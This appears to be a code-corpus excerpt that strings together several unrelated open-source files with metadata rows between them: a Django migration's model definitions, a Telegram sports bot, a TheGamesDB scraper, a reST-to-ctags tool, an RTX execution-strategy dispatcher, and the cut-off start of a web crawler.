'prerequisite': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profiles.Course']", 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '2', 'null': 'True'}),
'subject': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profiles.Subject']"}),
'tags': ('tagging.fields.TagField', [], {}),
'timeline': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'profiles.courseimage': {
'Meta': {'object_name': 'CourseImage'},
'author': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'course': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profiles.Course']"}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
'profiles.division': {
'Meta': {'object_name': 'Division'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'profiles.expertise': {
'Meta': {'object_name': 'Expertise'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'profiles.facultymember': {
'Meta': {'object_name': 'FacultyMember', '_ormbases': ['profiles.Person']},
'academic_title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'admin_title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'bio': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'expertise': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['profiles.Expertise']", 'null': 'True', 'blank': 'True'}),
'homeschool': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profiles.School']", 'null': 'True', 'blank': 'True'}),
'office': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'person_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['profiles.Person']", 'unique': 'True', 'primary_key': 'True'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '20', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '2'})
},
'profiles.person': {
'Meta': {'object_name': 'Person'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'cv': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'n_number': ('django.db.models.fields.CharField', [], {'max_length': '9'}),
'photo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['profiles.Project']", 'null': 'True', 'blank': 'True'}),
'tags': ('tagging.fields.TagField', [], {}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'use_which_cv': ('django.db.models.fields.CharField', [], {'max_length': '1', 'blank': 'True'}),
'user_account': ('django.db.models.fields.related.OneToOneField', [], {'blank': 'True', 'related_name': "'person_profile'", 'unique': 'True', 'null': 'True', 'to': "orm['auth.User']"})
},
'profiles.program': {
'Meta': {'object_name': 'Program'},
'abbreviation': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'fullname': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'school': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profiles.School']", 'null': 'True', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'profiles.project': {
'Meta': {'object_name': 'Project'},
'collaborators': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'course': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profiles.Course']", 'null': 'True', 'blank': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profiles.Person']", 'null': 'True', 'blank': 'True'}),
'creator_type': ('django.db.models.fields.CharField', [], {'default': "'I'", 'max_length': '2'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'format': ('tagging.fields.TagField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'participating_faculty': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['profiles.FacultyMember']", 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'ref_type': ('django.db.models.fields.CharField', [], {'default': "'I'", 'max_length': '2'}),
'scope_type': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'specifications': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'tags': ('tagging.fields.TagField', [], {}),
'thumbnail': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'default': "'Untitled'", 'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'})
},
'profiles.school': {
'Meta': {'object_name': 'School'},
'abbreviation': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'division': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profiles.Division']", 'null': 'True', 'blank': 'True'}),
'fullname': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'profiles.section': {
'Meta': {'object_name': 'Section'},
'course': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profiles.Course']"}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'crn': ('django.db.models.fields.IntegerField', [], {'default': '0', 'max_length': '4'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'instructors': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['profiles.FacultyMember']"}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['profiles.Project']", 'null': 'True', 'blank': 'True'}),
'semester': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profiles.Semester']"}),
'syllabus': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'syllabus_orig_filename': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'profiles.semester': {
'Meta': {'object_name': 'Semester'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'end_date': ('django.db.models.fields.DateField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'start_date': ('django.db.models.fields.DateField', [], {}),
'term': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'year': ('django.db.models.fields.PositiveIntegerField', [], {})
},
'profiles.student': {
'Meta': {'object_name': 'Student', '_ormbases': ['profiles.Person']},
'person_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['profiles.Person']", 'unique': 'True', 'primary_key': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '2'})
},
'profiles.subject': {
'Meta': {'object_name': 'Subject'},
'abbreviation': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'fullname': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'program': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profiles.Program']", 'null': 'True', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'profiles.workimage': {
'Meta': {'object_name': 'WorkImage'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profiles.Person']"}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
'profiles.workurl': {
'Meta': {'object_name': 'WorkURL'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'person': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profiles.Person']", 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
}
}
complete_apps = ['profiles']
|
agpl-3.0
| 2,768,419,188,654,010,400
| 80.905138
| 196
| 0.545025
| false
| 3.593826
| false
| false
| false
|
Paco1994/sportbot
|
sportbot/bot.py
|
1
|
1953
|
# -*- coding: utf-8 -*-
import telebot # Bot API library.
import random
from telebot import types # Types for the bot API.
import time # Library used to keep the program that controls the bot from ending.
import sys
from sportbot import bot
reload(sys)
sys.setdefaultencoding("utf-8")
local = True
gif = "https://lachatupdate.files.wordpress.com/2015/08/547b7a894bcc7.gif"
#usuarios = [line.rstrip('\n') for line in open('sources/usuarios.txt')] #load the list of users
administrador = '-24696186'
commands = { # command description used in the "help" command
'start': 'Empieza a usar el bot. Recibirás notificaciones globales cuando se actualice el bot.',
'help': 'Muestra el menú de ayuda.'
}
def listener(messages):
for m in messages:
cid = m.chat.id
mensaje = ""
if m.content_type == 'text': # Only text messages will appear in the log
if cid > 0:
mensaje = str(m.chat.first_name) + "[" + str(cid) + "]: " + m.text
#f = open('sources/log.txt', 'a')
#f.write(mensaje + "\n")
#f.close()
print mensaje
else:
if m.text[0] == '/':
mensaje = str(m.from_user.first_name) + "[" + str(cid) + "]: " + m.text
#f = open('sources/log.txt', 'a')
#f.write(mensaje + "\n")
#f.close()
print mensaje
bot.set_update_listener(listener) # This tells the bot to use our 'listener' function declared above as its listener function.
bot.polling(none_stop=True) # This tells the bot to keep running even if it runs into an error.
while True: # Now tell the program not to exit, using a loop that always runs.
#listadoURLs = ini2urls("sources/url.ini",0) # Read the URL list from the startup file
time.sleep(300)
|
gpl-3.0
| -2,492,374,418,671,157,000
| 39.458333
| 140
| 0.616375
| false
| 2.992296
| false
| false
| false
|
topfs2/heimdall
|
src/thegamesdb.py
|
1
|
5883
|
import heimdall
from heimdall import tasks
from heimdall import resources
from heimdall import supplies, demands
from heimdall.predicates import *
from game_item import comparePlatforms
import datetime
import difflib
import urllib
import xml.etree.ElementTree as ET
baseImageUrl = "http://thegamesdb.net/banners/"
def readTextElement(parent, elementName):
element = parent.find(elementName)
return element.text if (element != None and element.text != None) else ''
class GamePredicateObject(tasks.SubjectTask):
demand = [
demands.required(dc.identifier, "http://thegamesdb.net/game/"),
]
supply = [
supplies.emit(dc.title),
supplies.emit(dc.type),
supplies.emit(dc.description),
supplies.emit(dc.date),
supplies.emit(media.rating),
supplies.emit(swo.SWO_0000396), # Developer
supplies.emit(swo.SWO_0000397), # Publisher
supplies.emit(edamontology.data_3106), # Platform
supplies.emit("players"),
supplies.emit(foaf.thumbnail),
supplies.emit("fanart"),
supplies.emit("banner"),
supplies.emit("trailer"),
]
def require(self):
uri = self.subject[dc.identifier]
ID = uri[len("http://thegamesdb.net/game/"):]
return resources.SimpleResource("http://thegamesdb.net/api/GetGame.php?id=" + ID)
def run(self, resource):
root = ET.fromstring(resource)
gameRows = root.findall("Game")
if gameRows:
gameRow = gameRows[0]
gameTitle = readTextElement(gameRow, "GameTitle")
self.subject.emit(dc.title, gameTitle)
for genre in gameRow.findall("Genres/genre"):
self.subject.emit(dc.type, genre.text)
self.subject.emit(dc.description, readTextElement(gameRow, "Overview"))
try:
# Deserialize MM/DD/YYYY
dateobject = datetime.datetime.strptime(readTextElement(gameRow, "ReleaseDate"), "%m/%d/%Y")
self.subject.emit(dc.date, dateobject.strftime("%Y-%m-%d"))
except ValueError:
# can't be parsed by strptime()
pass
self.subject.emit(media.rating, readTextElement(gameRow, 'ESRB'))
self.subject.emit(swo.SWO_0000396, readTextElement(gameRow, 'Developer'))
self.subject.emit(swo.SWO_0000397, readTextElement(gameRow, 'Publisher'))
self.subject.emit(edamontology.data_3106, readTextElement(gameRow, 'Platform'))
self.subject.emit("players", readTextElement(gameRow, 'Players'))
for boxartRow in gameRow.findall('Images/boxart'):
side = boxartRow.attrib.get('side')
if side == 'front' and boxartRow.text:
self.subject.emit(foaf.thumbnail, baseImageUrl + boxartRow.text)
for fanartRow in gameRow.findall('Images/fanart'):
original = readTextElement(fanartRow, 'original')
if original:
thumb = readTextElement(fanartRow, 'thumb')
if thumb:
self.subject.emit("fanart", {"fanart": baseImageUrl + original, "thumbnail": baseImageUrl + thumb})
else:
self.subject.emit("fanart", baseImageUrl + original)
for bannerRow in gameRow.findall('Images/banner'):
self.subject.emit("banner", baseImageUrl + bannerRow.text)
self.subject.emit("trailer", readTextElement(gameRow, 'Youtube'))
def readTextElement(self, parent, elementName):
element = parent.find(elementName)
return element.text if (element != None and element.text != None) else ''
class SearchGameCollector(tasks.SubjectTask):
demand = [
demands.required(dc.title),
demands.required(edamontology.data_3106), # Platform
demands.requiredClass("item.game", True),
demands.none(owl.sameAs, "http://thegamesdb.net/game/[0-9]*")
]
supply = [
supplies.emit(owl.sameAs, "http://thegamesdb.net/game/")
]
def require(self):
title = self.subject[dc.title]
platform = self.translatePlatform(self.subject[edamontology.data_3106])
if platform:
uri = "http://thegamesdb.net/api/GetGame.php?name=%s&platform=%s" % \
(urllib.quote_plus(title), urllib.quote_plus(platform))
return resources.SimpleResource(uri)
else:
return []
def run(self, resource):
root = ET.fromstring(resource)
gameRows = root.findall("Game")
# TheGamesDB has search ordering problems. Sucks for XML scrapers... not for difflib!
possibilities = [readTextElement(gameRow, "GameTitle") for gameRow in gameRows]
gameTitle = difflib.get_close_matches(self.subject[dc.title], possibilities, 1)
if gameTitle:
gameTitle = gameTitle[0]
for gameRow in gameRows:
if gameTitle == readTextElement(gameRow, "GameTitle"):
gameId = readTextElement(gameRow, "id")
if gameId:
self.subject.emit(owl.sameAs, "http://thegamesdb.net/game/" + gameId)
break
def translatePlatform(self, platform):
uri = "http://thegamesdb.net/api/GetPlatformsList.php"
resource = resources.CachedSimpleResource(uri)
platformXML = resource.run(resource.require())
root = ET.fromstring(platformXML)
for tgdb_platform in root.findall("Platforms/Platform"):
nametag = tgdb_platform.find("name")
if nametag == None or nametag.text == None:
continue
if comparePlatforms(nametag.text, platform):
return nametag.text
return None
module = [ GamePredicateObject, SearchGameCollector ]
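# --- Illustrative sketch (not part of the original module) ---
# readTextElement defensively reads optional child elements from TheGamesDB
# GetGame.php responses, returning '' when the element is absent. A tiny
# hand-written XML fragment (not a real API response) shows both cases:
def _read_text_element_demo():
    xml = "<Game><GameTitle>Example Game</GameTitle><Overview>Short text.</Overview></Game>"
    game = ET.fromstring(xml)
    print(readTextElement(game, "GameTitle"))  # Example Game
    print(readTextElement(game, "Players"))    # '' (element missing)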
|
gpl-2.0
| 1,302,008,425,335,843,600
| 40.723404
| 123
| 0.617372
| false
| 3.90897
| false
| false
| false
|
jszakmeister/rst2ctags
|
rst2ctags.py
|
1
|
11006
|
#!/usr/bin/env python
# Copyright (C) 2013-2018 John Szakmeister <john@szakmeister.net>
# All rights reserved.
#
# This software is licensed as described in the file LICENSE.txt, which
# you should have received as part of this distribution.
from __future__ import absolute_import
from __future__ import print_function
import codecs
import errno
import io
import locale
import pkg_resources
import sys
import re
def _version():
'''Get version.'''
try:
return pkg_resources.get_distribution('rst2ctags').version
except pkg_resources.DistributionNotFound:
return 'dev'
__version__ = _version()
class ScriptError(Exception):
pass
def detect_encoding(filename):
with open(filename, 'rb') as f:
raw = f.read(4096)
potential_bom = raw[:4]
bom_encodings = [('utf-8-sig', codecs.BOM_UTF8),
('utf-16', codecs.BOM_UTF16_LE),
('utf-16', codecs.BOM_UTF16_BE),
('utf-32', codecs.BOM_UTF32_LE),
('utf-32', codecs.BOM_UTF32_BE)]
for encoding, bom in bom_encodings:
if potential_bom.startswith(bom):
return encoding
# No BOM found, let's try to detect encoding
encoding = None
try:
import chardet
result = chardet.detect(raw)
# If we're not really confident about the encoding, then skip to
# UTF-8 detection.
if result['confidence'] >= 0.9:
encoding = result['encoding']
if encoding == 'ascii':
encoding = 'utf-8'
except ImportError:
pass
if encoding is None:
try:
raw.rsplit(b' ')[0].decode('utf-8')
encoding = 'utf-8'
except UnicodeDecodeError:
pass
return encoding or 'latin1'
def open_autoenc(filename, encoding=None):
if encoding is None:
encoding = detect_encoding(filename)
return io.open(filename, encoding=encoding, newline='')
def ctag_name_escape(str):
str = re.sub('[\t\r\n]+', ' ', str)
str = re.sub(r'^\s*\\\((.)\)', r'(\1)', str)
return str
def ctag_search_escape(str):
str = str.replace('\\', r'\\')
str = str.replace('\t', r'\t')
str = str.replace('\r', r'\r')
str = str.replace('\n', r'\n')
for c in '[]*$.^':
str = str.replace(c, '\\' + c)
return str
class Tag(object):
def __init__(self, tag_name, tag_file, tag_address):
self.tag_name = tag_name
self.tag_file = tag_file
self.tag_address = tag_address
self.fields = []
def add_field(self, type, value=None):
if type == 'kind':
type = None
self.fields.append((type, value or ""))
def format_fields(self):
formattedFields = []
for name, value in self.fields:
if name:
s = '%s:%s' % (name, value or "")
else:
s = str(value)
formattedFields.append(s)
return '\t'.join(formattedFields)
def render(self):
return '%s\t%s\t%s;"\t%s' % (
self.tag_name, self.tag_file, self.tag_address, self.format_fields())
def __repr__(self):
return "<Tag name:%r file:%r: addr:%r %r>" % (
self.tag_name, self.tag_file, self.tag_address,
self.format_fields().replace('\t', ' '))
def _tuple(self):
return (self.tag_name, self.tag_file, self.tag_address,
self.format_fields())
def __eq__(self, other):
return self._tuple() == other._tuple()
def __ne__(self, other):
return self._tuple() != other._tuple()
def __lt__(self, other):
return self._tuple() < other._tuple()
def __le__(self, other):
return self._tuple() <= other._tuple()
def __gt__(self, other):
return self._tuple() > other._tuple()
def __ge__(self, other):
return self._tuple() >= other._tuple()
@staticmethod
def section(section, sro):
tag_name = ctag_name_escape(section.name)
tag_address = '/^%s$/' % ctag_search_escape(section.line)
t = Tag(tag_name, section.filename, tag_address)
t.add_field('kind', 's')
t.add_field('line', section.lineNumber)
parents = []
p = section.parent
while p is not None:
parents.append(ctag_name_escape(p.name))
p = p.parent
parents.reverse()
if parents:
t.add_field('section', sro.join(parents))
return t
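# --- Illustrative sketch (not part of the original module) ---
# A Tag renders to one line of the ctags file format:
#   {tagname}<TAB>{tagfile}<TAB>{tagaddress};"<TAB>{extension fields}
# A small hand-built example (made-up values):
def _tag_render_demo():
    t = Tag('Intro', 'doc.rst', '/^Intro$/')
    t.add_field('kind', 's')
    t.add_field('line', 3)
    print(t.render())   # Intro<TAB>doc.rst<TAB>/^Intro$/;"<TAB>s<TAB>line:3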
class Section(object):
def __init__(self, level, name, line, lineNumber, filename, parent=None):
self.level = level
self.name = name
self.line = line
self.lineNumber = lineNumber
self.filename = filename
self.parent = parent
def __repr__(self):
return '<Section %s %d %d>' % (self.name, self.level, self.lineNumber)
def pop_sections(sections, level):
while sections:
s = sections.pop()
if s and s.level < level:
sections.append(s)
return
heading_re = re.compile(r'''^([-=~:^"#*._+`'])\1+$''')
subject_re = re.compile(r'^[^\s]+.*$')
def find_sections(filename, lines):
sections = []
previousSections = []
level_values = {}
level = 0
for i, line in enumerate(lines):
if i == 0:
continue
if heading_re.match(line) and subject_re.match(lines[i - 1]):
if i >= 2:
topLine = lines[i-2]
else:
topLine = ''
# If the heading line is too short, then docutils doesn't consider
# it a heading.
if len(line) < len(lines[i-1]):
continue
name = lines[i-1].strip()
key = line[0]
if heading_re.match(topLine):
# If there is an overline, it must match the bottom line.
if topLine != line:
# Not a heading.
continue
# We have an overline, so double up.
key = key + key
if key not in level_values:
level_values[key] = level + 1
level = level_values[key]
pop_sections(previousSections, level)
if previousSections:
parent = previousSections[-1]
else:
parent = None
lineNumber = i
s = Section(level, name, lines[i-1], lineNumber,
filename, parent)
previousSections.append(s)
sections.append(s)
# Blank lines to help correctly detect:
# foo
# ===
# bar
# ===
#
# as two underline style headings.
lines[i] = lines[i-1] = ''
if topLine:
lines[i-2] = ''
return sections
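# Hedged illustration (added; not part of the original script): running
# find_sections() over a tiny reST fragment.  File name and headings are made up.
def _find_sections_example():
    lines = ['Intro', '=====', '', 'Details', '-------', '']
    secs = find_sections('example.rst', lines)
    # secs[0] is 'Intro' at level 1; secs[1] is 'Details' at level 2 with
    # 'Intro' as its parent, because '-' first appears underneath '='.
    return secs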
def sections_to_tags(sections, sro):
tags = []
for section in sections:
tags.append(Tag.section(section, sro))
return tags
def gen_tags_header(output, sort):
if sort == "yes":
sortedLine = b'!_TAG_FILE_SORTED\t1\t//\n'
elif sort == "foldcase":
sortedLine = b'!_TAG_FILE_SORTED\t2\t//\n'
else:
sortedLine = b'!_TAG_FILE_SORTED\t0\t//\n'
output.write(b'!_TAG_FILE_ENCODING\tutf-8\t//\n')
output.write(b'!_TAG_FILE_FORMAT\t2\t//\n')
output.write(sortedLine)
def gen_tags_content(output, sort, tags):
if sort == "yes":
tags = sorted(tags)
elif sort == "foldcase":
tags = sorted(tags, key=lambda x: str(x).lower())
for t in tags:
output.write(t.render().encode('utf-8'))
output.write('\n'.encode('utf-8'))
def main():
from optparse import OptionParser
parser = OptionParser(usage="usage: %prog [options] file(s)",
version=__version__)
parser.add_option(
"-f", "--file", metavar="FILE", dest="tagfile",
default="tags",
help='Write tags into FILE (default: "tags"). Use "-" to write '
'tags to stdout.')
parser.add_option(
"", "--encoding", metavar="ENCODING", dest="encoding",
default=None,
help='Skips auto detection and uses the specified encoding for the '
'input files. Encoding name should be one that Python would '
'recognize.')
parser.add_option(
"", "--sort", metavar="[yes|foldcase|no]", dest="sort",
choices=["yes", "no", "foldcase"],
default="yes",
help='Produce sorted output. Acceptable values are "yes", '
'"no", and "foldcase". Default is "yes".')
parser.add_option(
"", "--sro", metavar="SEPARATOR", dest="sro",
default="|", action="store",
        help=u'Use the specified string to scope nested headings. The '
             'default is the pipe symbol ("|"), but that can be an issue if '
             'your headings contain the pipe symbol. It might be more useful '
             'to use a character such as the UTF-8 chevron ("\u00bb").')
options, args = parser.parse_args()
if not args:
raise ScriptError("No input files specified.")
if sys.version_info[0] == 2:
encoding = sys.stdin.encoding or locale.getpreferredencoding() or 'utf-8'
options.sro = options.sro.decode(encoding)
if options.tagfile == '-':
if sys.version_info[0] == 2:
output = sys.stdout
else:
output = sys.stdout.buffer
else:
output = open(options.tagfile, 'wb')
gen_tags_header(output, options.sort)
all_sections = []
try:
for filename in args:
if sys.version_info[0] == 2:
filename = filename.decode(sys.getfilesystemencoding())
try:
with open_autoenc(filename, encoding=options.encoding) as f:
buf = f.read()
except IOError as e:
if e.errno == errno.EPIPE:
raise
print_warning(e)
continue
lines = buf.splitlines()
del buf
sections = find_sections(filename, lines)
all_sections.extend(sections)
finally:
# We do this to match ctags behavior... even when a file is missing,
# it'll write out the tags it has.
gen_tags_content(output,
options.sort,
sections_to_tags(all_sections, options.sro))
output.flush()
output.close()
def print_warning(e):
print("WARNING: %s" % str(e), file=sys.stderr)
def print_error(e):
print("ERROR: %s" % str(e), file=sys.stderr)
def cli_main():
try:
main()
except IOError as e:
if e.errno == errno.EPIPE:
# Exit saying we got SIGPIPE.
sys.exit(141)
print_error(e)
sys.exit(1)
except ScriptError as e:
print_error(e)
sys.exit(1)
if __name__ == '__main__':
cli_main()
|
bsd-3-clause
| 7,713,842,127,701,343,000
| 26.58396
| 81
| 0.535344
| false
| 3.787337
| false
| false
| false
|
Starofall/RTX
|
rtxlib/executionstrategy/__init__.py
|
1
|
2569
|
from rtxlib.executionstrategy.ForeverStrategy import start_forever_strategy
from rtxlib.executionstrategy.StepStrategy import start_step_strategy
from rtxlib.executionstrategy.SelfOptimizerStrategy import start_self_optimizer_strategy
from rtxlib.executionstrategy.SequencialStrategy import start_sequential_strategy
from rtxlib import log_results, error, info
from rtxlib.executionstrategy.UncorrelatedSelfOptimizerStrategy import start_uncorrelated_self_optimizer_strategy
def run_execution_strategy(wf):
""" we run the correct execution strategy """
applyInitKnobs(wf)
try:
# start the right execution strategy
if wf.execution_strategy["type"] == "sequential":
log_results(wf.folder, wf.execution_strategy["knobs"][0].keys() + ["result"], append=False)
start_sequential_strategy(wf)
elif wf.execution_strategy["type"] == "self_optimizer":
log_results(wf.folder, wf.execution_strategy["knobs"].keys() + ["result"], append=False)
start_self_optimizer_strategy(wf)
elif wf.execution_strategy["type"] == "uncorrelated_self_optimizer":
log_results(wf.folder, wf.execution_strategy["knobs"].keys() + ["result"], append=False)
start_uncorrelated_self_optimizer_strategy(wf)
elif wf.execution_strategy["type"] == "step_explorer":
log_results(wf.folder, wf.execution_strategy["knobs"].keys() + ["result"], append=False)
start_step_strategy(wf)
elif wf.execution_strategy["type"] == "forever":
start_forever_strategy(wf)
except RuntimeError:
error("Stopped the whole workflow as requested by a RuntimeError")
# finished
info(">")
applyDefaultKnobs(wf)
def applyInitKnobs(wf):
""" we are done, so revert to default if given """
if "pre_workflow_knobs" in wf.execution_strategy:
try:
info("> Applied the pre_workflow_knobs")
wf.change_provider["instance"] \
.applyChange(wf.change_event_creator(wf.execution_strategy["pre_workflow_knobs"]))
except:
error("apply changes did not work")
def applyDefaultKnobs(wf):
""" we are done, so revert to default if given """
if "post_workflow_knobs" in wf.execution_strategy:
try:
info("> Applied the post_workflow_knobs")
wf.change_provider["instance"] \
.applyChange(wf.change_event_creator(wf.execution_strategy["post_workflow_knobs"]))
except:
error("apply changes did not work")
|
mit
| 7,610,358,323,314,089,000
| 41.816667
| 113
| 0.669132
| false
| 4.001558
| false
| false
| false
|
niteeshsood/LoktraTest
|
webcrawler.py
|
1
|
1769
|
import urllib2
from bs4 import BeautifulSoup
import getopt
import sys
import pdb
def makeint(s):
 s = s.strip()
ans=0
for i in xrange(len(s)):
if s[i].isdigit():
ans=10*ans+int(s[i])
return ans
def main(argv):
try:
opts, args = getopt.getopt(argv,'hp:k:', )
